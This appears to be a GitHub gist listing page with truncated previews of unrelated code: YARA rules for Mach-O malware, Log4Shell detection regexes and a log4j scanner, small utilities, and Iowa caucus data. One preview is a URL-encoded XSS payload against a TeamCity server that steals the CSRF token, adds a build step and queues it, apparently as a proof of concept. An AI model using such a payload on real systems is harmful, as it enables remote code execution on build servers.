Duplicate Plaintext Blocks:
Total Blocks: 358414
Total Duplicates: 349474
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
private rule Macho | |
{ | |
meta: | |
description = "private rule to match Mach-O binaries (copied from Apple's XProtect)" | |
condition: | |
uint32(0) == 0xfeedface or uint32(0) == 0xcefaedfe or uint32(0) == 0xfeedfacf or uint32(0) == 0xcffaedfe or uint32(0) == 0xcafebabe or uint32(0) == 0xbebafeca | |
} | |
rule ZoomDaemon | |
{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
const pack = s => | |
s.match(/^[\u0000-\u00ff]*$/) | |
? s | |
.split("") | |
.map(s => s.charCodeAt()) | |
.reduce( | |
(pairs, c) => | |
( | |
!c || pairs[pairs.length - 1].length === 2 | |
? pairs.push(...(c? [[c]] : [[c], []])) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
https://builds.gradle.org/project.html?projectId=GradleProfiler&tab=problems%27%7D)%3B%7D)()%3B((w%2Cd%2Ch%2Cx%2Cn)%3D%3E%7Bw.p%7C%7C(w.p%3D1%2Cw.onerror%3D()%3D%3E1%2Cw.addEventListener(%22DOMContentLoaded%22%2C()%3D%3E%7Bw.history.replaceState(0%2Cd.title%2Ch.slice(0%2Ch.indexOf(%22%2527%22)))%3Bvar%20t%3Dd.querySelector(%22.tc-csrf-token-input%22).value%2Ce%3Dx(%60%2Fadmin%2FeditRunType.html%3Fid%3DbuildType%253A%24%7Bn%7D%26runnerId%3D__NEW_RUNNER__%26submitBuildType%3Dstore%60)%3Be.onloadend%3D()%3D%3E%7Bvar%20a%3Dx(%22%2Fajax.html%22)%3Ba.setRequestHeader(%22X-TC-CSRF-Token%22%2Ct)%3Ba.send(%60add2Queue%3D%24%7Bn%7D%26validate%3Dtrue%26redirectTo%60)%3B%7D%3Be.send(%60runTypeInfoKey%3DsimpleRunner%26buildStepName%3DRCE%2BDemo%26prop%253Ateamcity.step.mode%3Ddefault%26prop%253Ause.custom.script%3Dtrue%26prop%253Ascript.content%3Decho%2B%2522RCE%2Bvia%2BXSS%2522%26submitButton%3DSave%26tc-csrf-token%3D%24%7Bt%7D%60)%7D))%7D)(window%2Cdocument%2Clocation.href%2Cp%3D%3E%7Bvar%20x%3Dnew%20XMLHttpRequest()%3B |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
export type Formatters = { [k: string]: (s: string) => string }; | |
export class FormatError extends Error { | |
constructor( | |
public message: string, | |
public str: string, | |
public formatters: Formatters, | |
public tag: string | |
) { | |
super(); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
export type StringReturningFunction = (...args: any[]) => string; | |
interface LazyString extends String {} | |
interface LazyStringConstructor { | |
new <F extends StringReturningFunction>( | |
func: F, | |
...args: Parameters<F> | |
): LazyString; | |
<F extends StringReturningFunction>(func: F, ...args: Parameters<F>): string; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/env python3 | |
import dataclasses | |
import re | |
import socket | |
import ssl as _ssl | |
import types | |
from collections import namedtuple, OrderedDict | |
from dataclasses import dataclass | |
from io import StringIO | |
from itertools import chain |
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{"Adair":{"4SE ORIENT":{"Bennet":{"First Expression":0.0,"Final Expression":0.0,"SDE":0.0},"Biden":{"First Expression":7.0,"Final Expression":7.0,"SDE":0.1569},"Bloomberg":{"First Expression":0.0,"Final Expression":0.0,"SDE":0.0},"Buttigieg":{"First Expression":6.0,"Final Expression":6.0,"SDE":0.1569},"Delaney":{"First Expression":0.0,"Final Expression":0.0,"SDE":0.0},"Gabbard":{"First Expression":0.0,"Final Expression":0.0,"SDE":0.0},"Klobuchar":{"First Expression":6.0,"Final Expression":6.0,"SDE":0.1569},"Patrick":{"First Expression":0.0,"Final Expression":0.0,"SDE":0.0},"Sanders":{"First Expression":6.0,"Final Expression":6.0,"SDE":0.0784},"Steyer":{"First Expression":0.0,"Final Expression":0.0,"SDE":0.0},"Warren":{"First Expression":9.0,"Final Expression":9.0,"SDE":0.2353},"Yang":{"First Expression":0.0,"Final Expression":0.0,"SDE":0.0},"Other":{"First Expression":0.0,"Final Expression":0.0,"SDE":0.0},"Uncommitted":{"First Expression":0.0,"Final Expression":0.0,"SDE":0.0}},"1NW ADAIR":{"Bennet":{"First Ex |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import re | |
from urllib.parse import unquote | |
FLAGS = re.IGNORECASE | re.DOTALL | |
ESC_DOLLAR = r'(?:\$|[\\%]u0024||\\x24|\\0?44|%24)' | |
ESC_LCURLY = r'(?:\{|[\\%]u007B|\\x7B|\\173|%7B)' | |
ESC_RCURLY = r'(?:\}|[\\%]u007D|\\x7D|\\175|%7D)' | |
_U_PERCENT_ESCAPE_RE = re.compile(r'%(u[0-9a-f]{4})', flags=FLAGS) | |
_PERCENT_ESCAPE_RE = re.compile(r'%[0-9a-f]{2}', flags=FLAGS) |
When run on a box, outputs a single row of JSON for every proc on the box that loads a jar
/war
that contains any files with 'log4j'
in them, including precisely what triggered the match. For example (pretty printed here for clarity; note that this one is happily a false positive):
{
"node": "HW0000001",
"time": 1632617610.3860812,
"pid": 78676,
"cmd": "/usr/local/opt/openjdk/libexec/openjdk.jdk/Contents/Home/bin/java",
"args": [
"-Xms128M",